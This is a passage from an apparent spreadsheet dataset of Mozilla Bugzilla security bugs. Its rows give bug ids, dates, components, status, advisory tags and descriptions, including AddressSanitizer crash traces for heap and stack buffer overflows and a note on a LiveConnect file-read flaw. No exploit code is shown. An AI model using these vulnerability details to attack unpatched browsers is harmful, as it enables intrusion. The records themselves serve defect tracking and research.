    #25 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #26 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #27 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #31 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #32 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #33 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9 in ~RefPtr
Shadow bytes around the buggy address:
  0x0c0480035770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c04800357c0: fa fa 00 00 fa[fa]00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357e0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x0c04800357f0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035800: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035810: fa fa fd fd fa fa fd fd fa fa fd fd fa fa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6299==ABORTING</t>
        </is>
      </c>
      <c r="X816" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="817">
      <c r="A817" t="n">
        <v>1770930</v>
      </c>
      <c r="B817" t="inlineStr">
        <is>
          <t>2022-05-24 05:56:35 -0700</t>
        </is>
      </c>
      <c r="C817" t="inlineStr">
        <is>
          <t>AddressSanitizer: stack-buffer-underflow [@ rx::`anonymous namespace'::SortAttributesByLayout] with WRITE of size 4</t>
        </is>
      </c>
      <c r="D817" t="inlineStr">
        <is>
          <t>2023-01-16 21:00:34 -0800</t>
        </is>
      </c>
      <c r="E817" t="n">
        <v>1</v>
      </c>
      <c r="F817" t="n">
        <v>1</v>
      </c>
      <c r="G817" t="n">
        <v>3</v>
      </c>
      <c r="H817" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I817" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J817" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K817" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L817" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M817" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N817" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P817" t="inlineStr">
        <is>
          <t>[fixed by bug 1779800][adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q817" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R817" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S817" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T817" t="n">
        <v>1</v>
      </c>
      <c r="U817" t="n">
        <v>0</v>
      </c>
      <c r="V817" t="n">
        <v>10</v>
      </c>
      <c r="W817" t="inlineStr">
        <is>
          <t>The attached crash information was submitted via the ASan Nightly Reporter on mozilla-central-asan-nightly revision 102.0a1-20220507213841-https://hg.mozilla.org/mozilla-central/rev/1d8f6404d0b9dd80fb4e5d57c5fe6eeaf0ab5161.
For detailed crash information, see attachment.
Looks like we are hitting a left redzone, could it be that we are somehow reading before the array that we are accessing here? https://searchfox.org/mozilla-central/rev/1c391443f770eddc7cde9e52dba5ef50cc233c06/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/StateManager11.cpp#201</t>
        </is>
      </c>
      <c r="X817" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="818">
      <c r="A818" t="n">
        <v>239122</v>
      </c>
      <c r="B818" t="inlineStr">
        <is>
          <t>2004-03-29 15:10:38 -0800</t>
        </is>
      </c>
      <c r="C818" t="inlineStr">
        <is>
          <t>Liveconnect can be used to read any file on user's filesystem</t>
        </is>
      </c>
      <c r="D818" t="inlineStr">
        <is>
          <t>2013-12-27 14:30:34 -0800</t>
        </is>
      </c>
      <c r="E818" t="n">
        <v>1</v>
      </c>
      <c r="F818" t="n">
        <v>1</v>
      </c>
      <c r="G818" t="n">
        <v>6</v>
      </c>
      <c r="H818" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I818" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J818" t="inlineStr">
        <is>
          <t>Java: Live Connect</t>
        </is>
      </c>
      <c r="K818" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L818" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M818" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N818" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P818" t="inlineStr">
        <is>
          <t>[sg:fix]doesnotaffect1.4</t>
        </is>
      </c>
      <c r="Q818" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R818" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S818" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T818" t="n">
        <v>1</v>
      </c>
      <c r="U818" t="n">
        <v>0</v>
      </c>
      <c r="V818" t="n">
        <v>25</v>
      </c>
      <c r="W818" t="inlineStr">
        <is>
          <t>Liveconnect can be used to read any file on user's filesystem.
The patch for bug 146458 makes it possible to use Liveconnect to read any file
on the user's filesystem.
The change to nsCSecurityContext.cpp in the Implies method appears to be the
problem.
Attaching test case and patch.
The exploit is possible with Mozilla 1.7 beta.  I've only tested the Linux build.</t>
        </is>
      </c>
      <c r="X818" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="819">
      <c r="A819" t="n">
        <v>825721</v>
      </c>
      <c r="B819" t="inlineStr">
        <is>
          <t>2012-12-31 19:49:05 -0800</t>
        </is>
      </c>
      <c r="C819" t="inlineStr">
        <is>
          <t>OOB Write in pixman_fill_sse2</t>
        </is>
      </c>
      <c r="D819" t="inlineStr">
        <is>
          <t>2024-05-30 07:59:03 -0700</t>
        </is>
      </c>
      <c r="E819" t="n">
        <v>1</v>
      </c>
      <c r="F819" t="n">
        <v>1</v>
      </c>
      <c r="G819" t="n">
        <v>3</v>
      </c>
      <c r="H819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I819" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J819" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K819" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L819" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M819" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N819" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P819" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q819" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R819" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S819" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T819" t="n">
        <v>1</v>
      </c>
      <c r="U819" t="n">
        <v>0</v>
      </c>
      <c r="V819" t="n">
        <v>50</v>
      </c>
      <c r="W819" t="inlineStr">
        <is>
          <t>Created attachment 696848
Testcase
&gt;==10500== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f72101bb970 at pc 0x7f724f461205 bp 0x7fffc65c2270 sp 0x7fffc65c2268
&gt;WRITE of size 16 at 0x7f72101bb970 thread T0
&gt;    #0 0x7f724f461204 in pixman_fill_sse2 src/gfx/cairo/libpixman/src/pixman-sse2.c:362
&gt;    #1 0x7f724f4547fb in sse2_fill src/gfx/cairo/libpixman/src/pixman-sse2.c:5904
&gt;    #2 0x7f724f28d406 in _pixman_implementation_fill src/gfx/cairo/libpixman/src/pixman-implementation.c:182
&gt;    #3 0x7f724f28ab33 in delegate_fill src/gfx/cairo/libpixman/src/pixman-implementation.c:62
&gt;    #4 0x7f724f28d406 in _pixman_implementation_fill src/gfx/cairo/libpixman/src/pixman-implementation.c:182
&gt;    #5 0x7f724eeef8db in _moz_pixman_fill src/gfx/cairo/libpixman/src/pixman.c:773
&gt;    #6 0x7f724d8d6e93 in _composite_boxes src/gfx/cairo/cairo/src/cairo-image-surface.c:2940
&gt;    #7 0x7f724d8c48fe in _clip_and_composite_boxes src/gfx/cairo/cairo/src/cairo-image-surface.c:3034
&gt;    #8 0x7f724d8c7dd8 in _clip_and_composite_trapezoids src/gfx/cairo/cairo/src/cairo-image-surface.c:3190
&gt;    #9 0x7f724d8c66e8 in _clip_and_composite_polygon src/gfx/cairo/cairo/src/cairo-image-surface.c:3567
&gt;    #10 0x7f724d895820 in _cairo_image_surface_fill src/gfx/cairo/cairo/src/cairo-image-surface.c:3758
&gt;    #11 0x7f724da967ff in _cairo_surface_fill src/gfx/cairo/cairo/src/cairo-surface.c:2348
&gt;    #12 0x7f724d857d9f in _cairo_gstate_fill src/gfx/cairo/cairo/src/cairo-gstate.c:1295
&gt;    #13 0x7f724d77f6a6 in _moz_cairo_fill_preserve src/gfx/cairo/cairo/src/cairo.c:2459
&gt;    #14 0x7f724ca6d497 in gfxContext::Fill() src/gfx/thebes/gfxContext.cpp:303
&gt;    #15 0x7f7245a3678e in nsSVGPathGeometryFrame::Render(nsRenderingContext*) src/layout/svg/nsSVGPathGeometryFrame.cpp:594
&gt;    #16 0x7f7245a35103 in nsSVGPathGeometryFrame::PaintSVG(nsRenderingContext*, nsIntRect const*) src/layout/svg/nsSVGPathGeometryFrame.cpp:188
&gt;    #17 0x7f7245a37e1f in non-virtual thunk to nsSVGPathGeometryFrame::PaintSVG(nsRenderingContext*, nsIntRect const*) src/layout/svg/nsSVGPathGeometryFrame.cpp:224
&gt;    #18 0x7f7245a8819a in nsSVGUtils::PaintFrameWithEffects(nsRenderingContext*, nsIntRect const*, nsIFrame*) src/layout/svg/nsSVGUtils.cpp:922
&gt;    #19 0x7f7245a156e3 in nsSVGMaskFrame::ComputeMaskAlpha(nsRenderingContext*, nsIFrame*, gfxMatrix const&amp;, float) src/layout/svg/nsSVGMaskFrame.cpp:109
&gt;    #20 0x7f7245a04bce in nsSVGIntegrationUtils::PaintFramesWithEffects(nsRenderingContext*, nsIFrame*, nsRect const&amp;, nsDisplayListBuilder*, mozilla::layers::LayerManager*) src/layout/svg/nsSVGIntegrationUtils.cpp:517
&gt;    #21 0x7f723f09efc1 in nsDisplaySVGEffects::PaintAsLayer(nsDisplayListBuilder*, nsRenderingContext*, mozilla::layers::LayerManager*) src/layout/base/nsDisplayList.cpp:4364
&gt;    #22 0x7f723ed3ae36 in mozilla::PaintInactiveLayer(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsDisplayItem*, gfxContext*, nsRenderingContext*) src/layout/base/FrameLayerBuilder.cpp:1977
&gt;    #23 0x7f723ed35b81 in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) src/layout/base/FrameLayerBuilder.cpp:3320
&gt;    #24 0x7f724ce18600 in mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) src/gfx/layers/basic/BasicThebesLayer.h:94
&gt;    #25 0x7f724ce17caf in mozilla::layers::BasicShadowableThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) src/gfx/layers/basic/BasicThebesLayer.cpp:400
&gt;    #26 0x7f724ce107f3 in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:187
&gt;    #27 0x7f724ce152eb in mozilla::layers::BasicShadowableThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:301
&gt;    #28 0x7f724ce15ce4 in non-virtual thunk to mozilla::layers::BasicShadowableThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:312
&gt;    #29 0x7f724cd9ddd6 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:819
&gt;    #30 0x7f724cd9b0da in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #31 0x7f724cd9e3b6 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:835
&gt;    #32 0x7f724cd9b0da in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #33 0x7f724cd9e3b6 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:835
&gt;    #34 0x7f724cd9b0da in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #35 0x7f724cd964d2 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:590
&gt;    #36 0x7f724cd94c3c in mozilla::layers::BasicLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:509
&gt;    #37 0x7f724cda88f4 in mozilla::layers::BasicShadowLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:1144
&gt;    #38 0x7f723f03fc9d in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const src/layout/base/nsDisplayList.cpp:1164
&gt;    #39 0x7f723f03cdec in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const src/layout/base/nsDisplayList.cpp:1026
&gt;    #40 0x7f723f1e7166 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) src/layout/base/nsLayoutUtils.cpp:1976
&gt;    #41 0x7f723f340d61 in PresShell::Paint(nsIView*, nsRegion const&amp;, unsigned int) src/layout/base/nsPresShell.cpp:5358
&gt;    #42 0x7f72434dfdbb in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) src/view/src/nsViewManager.cpp:428
&gt;    #43 0x7f72434f36e0 in nsViewManager::ProcessPendingUpdates() src/view/src/nsViewManager.cpp:1216
&gt;    #44 0x7f723f3c627e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) src/layout/base/nsRefreshDriver.cpp:947
&gt;    #45 0x7f723f3dc63b in mozilla::RefreshDriverTimer::TickDriver(nsRefreshDriver*, long, mozilla::TimeStamp) src/layout/base/nsRefreshDriver.cpp:164
&gt;    #46 0x7f723f3dbc52 in mozilla::RefreshDriverTimer::Tick() src/layout/base/nsRefreshDriver.cpp:156
&gt;    #47 0x7f723f3db0fb in mozilla::RefreshDriverTimer::TimerTick(nsITimer*, void*) src/layout/base/nsRefreshDriver.cpp:181
&gt;    #48 0x7f724c4f615b in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:482
&gt;    #49 0x7f724c4f75e4 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:565
&gt;    #50 0x7f724c4b99cf in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #51 0x7f724c12e355 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:237
&gt;    #52 0x7f7249d2ad7c in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #53 0x7f724c7aafe2 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #54 0x7f724c7aae19 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #55 0x7f724c7aacee in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #56 0x7f724911e947 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #57 0x7f7247c4c3b5 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #58 0x7f723cf3ec14 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
&gt;    #59 0x7f723cf447fa in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #60 0x7f723cf475c0 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4088
&gt;    #61 0x41d8d6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
&gt;    #62 0x41b0f0 in main src/browser/app/nsBrowserApp.cpp:279
&gt;    #63 0x7f725f01176c in
&gt;0x7f72101bb970 is located 10384 bytes to the left of 65536-byte region [0x7f72101be200,0x7f72101ce200)
&gt;freed by thread T8 (JS Sour~ Thread) here:
&gt;    #0 0x40f942 in __interceptor_free
&gt;    #1 0x7f7254c34cc9 in js_free(void*) src/./../../dist/include/js/Utility.h:165
&gt;    #2 0x7f7254c32832 in zlib_free(void*, void*) src/js/src/jsutil.cpp:42
&gt;    #3 0x7f724d184285 in MOZ_Z_deflateEnd src/modules/zlib/src/deflate.c:996
&gt;    #4 0x7f7254c32967 in js::Compressor::~Compressor() src/js/src/jsutil.cpp:63
&gt;    #5 0x7f72546bd1e0 in js::SourceCompressorThread::internalCompress() src/js/src/jsscript.cpp:1003
&gt;    #6 0x7f72546bb127 in js::SourceCompressorThread::threadLoop() src/js/src/jsscript.cpp:1030
&gt;    #7 0x7f72546bae52 in js::SourceCompressorThread::compressorThread(void*) src/js/src/jsscript.cpp:905
&gt;    #8 0x7f725e590a59 in _pt_root src/nsprpub/pr/src/pthreads/ptthread.c:156
&gt;    #9 0x41485a in __asan::AsanThread::ThreadStart()
&gt;previously allocated by thread T8 (JS Sour~ Thread) here:
&gt;    #0 0x40fa22 in malloc
&gt;    #1 0x7f7254c34de3 in js_malloc(unsigned long) src/./../../dist/include/js/Utility.h:148
&gt;    #2 0x7f7254c326a6 in zlib_alloc(void*, unsigned int, unsigned int) src/js/src/jsutil.cpp:36
&gt;    #3 0x7f724d182cd7 in MOZ_Z_deflateInit2_ src/modules/zlib/src/deflate.c:301
&gt;    #4 0x7f724d1803f7 in MOZ_Z_deflateInit_ src/modules/zlib/src/deflate.c:207
&gt;    #5 0x7f7254c32c02 in js::Compressor::init() src/js/src/jsutil.cpp:76
&gt;    #6 0x7f72546bc6e0 in js::SourceCompressorThread::internalCompress() src/js/src/jsscript.cpp:971
&gt;    #7 0x7f72546bb127 in js::SourceCompressorThread::threadLoop() src/js/src/jsscript.cpp:1030
&gt;    #8 0x7f72546bae52 in js::SourceCompressorThread::compressorThread(void*) src/js/src/jsscript.cpp:905
&gt;    #9 0x7f725e590a59 in _pt_root src/nsprpub/pr/src/pthreads/ptthread.c:156
&gt;    #10 0x41485a in __asan::AsanThread::ThreadStart()
&gt;Thread T8 (JS Sour~ Thread) created by T0 here:
&gt;    #0 0x40d1f4 in __interceptor_pthread_create
&gt;    #1 0x7f725e581d55 in _PR_CreateThread src/nsprpub/pr/src/pthreads/ptthread.c:393
&gt;    #2 0x7f725e57fb46 in PR_CreateThread src/nsprpub/pr/src/pthreads/ptthread.c:476
&gt;    #3 0x7f72546bb78a in js::SourceCompressorThread::init() src/js/src/jsscript.cpp:921
&gt;    #4 0x7f72536883e6 in JSRuntime::init(unsigned int) src/js/src/jsapi.cpp:960
&gt;    #5 0x7f725368c5da in JS_NewRuntime(unsigned int, JSUseHelperThreads) src/js/src/jsapi.cpp:1131
&gt;    #6 0x7f7246bcef85 in XPCJSRuntime::XPCJSRuntime(nsXPConnect*) src/js/xpconnect/src/XPCJSRuntime.cpp:2451
&gt;    #7 0x7f7246bd3774 in XPCJSRuntime::newXPCJSRuntime(nsXPConnect*) src/js/xpconnect/src/XPCJSRuntime.cpp:2546
&gt;    #8 0x7f72468d257d in nsXPConnect::nsXPConnect() src/js/xpconnect/src/nsXPConnect.cpp:85
&gt;    #9 0x7f72468d4801 in nsXPConnect::GetXPConnect() src/js/xpconnect/src/nsXPConnect.cpp:145
&gt;    #10 0x7f7240a6000c in nsContentUtils::Init() src/content/base/src/nsContentUtils.cpp:340
&gt;    #11 0x7f723ed03b81 in nsLayoutStatics::Initialize() src/layout/build/nsLayoutStatics.cpp:152
&gt;    #12 0x7f723ecac11e in Initialize() src/layout/build/nsLayoutModule.cpp:389
&gt;    #13 0x7f724c4545be in nsComponentManagerImpl::KnownModule::Load() src/xpcom/components/nsComponentManager.cpp:708
&gt;    #14 0x7f724c458d45 in nsFactoryEntry::GetFactory() src/xpcom/components/nsComponentManager.cpp:1749
&gt;    #15 0x7f724c45c032 in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) src/xpcom/components/nsComponentManager.cpp:1031
&gt;    #16 0x7f724c442b65 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) src/xpcom/components/nsComponentManager.cpp:1427
&gt;    #17 0x7f724c43f812 in nsGetServiceFromCategory::operator()(nsID const&amp;, void**) const src/xpcom/components/nsComponentManager.cpp:166
&gt;    #18 0x7f724c0e7b72 in nsCOMPtr_base::assign_from_helper(nsCOMPtr_helper const&amp;, nsID const&amp;) src/objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:110
&gt;    #19 0x7f724c460c9f in nsCOMPtr&lt;mozilla::ModuleLoader&gt;::operator=(nsCOMPtr_helper const&amp;) src/../../dist/include/nsCOMPtr.h:691
&gt;    #20 0x7f724c453cc4 in nsComponentManagerImpl::LoaderForExtension(nsACString_internal const&amp;) src/xpcom/components/nsComponentManager.cpp:1455
&gt;    #21 0x7f724c4532e0 in nsComponentManagerImpl::KnownModule::EnsureLoader() src/xpcom/components/nsComponentManager.cpp:685
&gt;    #22 0x7f724c454205 in nsComponentManagerImpl::KnownModule::Load() src/xpcom/components/nsComponentManager.cpp:696
&gt;    #23 0x7f724c458d45 in nsFactoryEntry::GetFactory() src/xpcom/components/nsComponentManager.cpp:1749
&gt;    #24 0x7f724c45c032 in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) src/xpcom/components/nsComponentManager.cpp:1031
&gt;    #25 0x7f724c442b65 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) src/xpcom/components/nsComponentManager.cpp:1427
&gt;    #26 0x7f724c0f7e5d in CallGetService(char const*, nsID const&amp;, void**) src/objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:60
&gt;    #27 0x7f724c0fc219 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const src/objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:256
&gt;    #28 0x7f724c0e77d7 in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) src/objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:101
&gt;    #29 0x7f724795ccaf in nsCOMPtr&lt;nsISupports&gt;::operator=(nsGetServiceByContractIDWithError const&amp;) src/../../../../dist/include/nsCOMPtr.h:1003
&gt;    #30 0x7f724795c463 in nsAppStartupNotifier::Observe(nsISupports*, char const*, unsigned short const*) src/embedding/components/appstartup/src/nsAppStartupNotifier.cpp:62
&gt;    #31 0x7f723cf3c303 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3658
&gt;    #32 0x7f723cf447fa in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #33 0x7f723cf475c0 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4088
&gt;    #34 0x41d8d6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
&gt;    #35 0x41b0f0 in main src/browser/app/nsBrowserApp.cpp:279
&gt;    #36 0x7f725f01176c in
&gt;Shadow bytes around the buggy address:
&gt;  0x1fee420376d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee420376e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee420376f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;=&gt;0x1fee42037720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa
&gt;  0x1fee42037730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fee42037770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
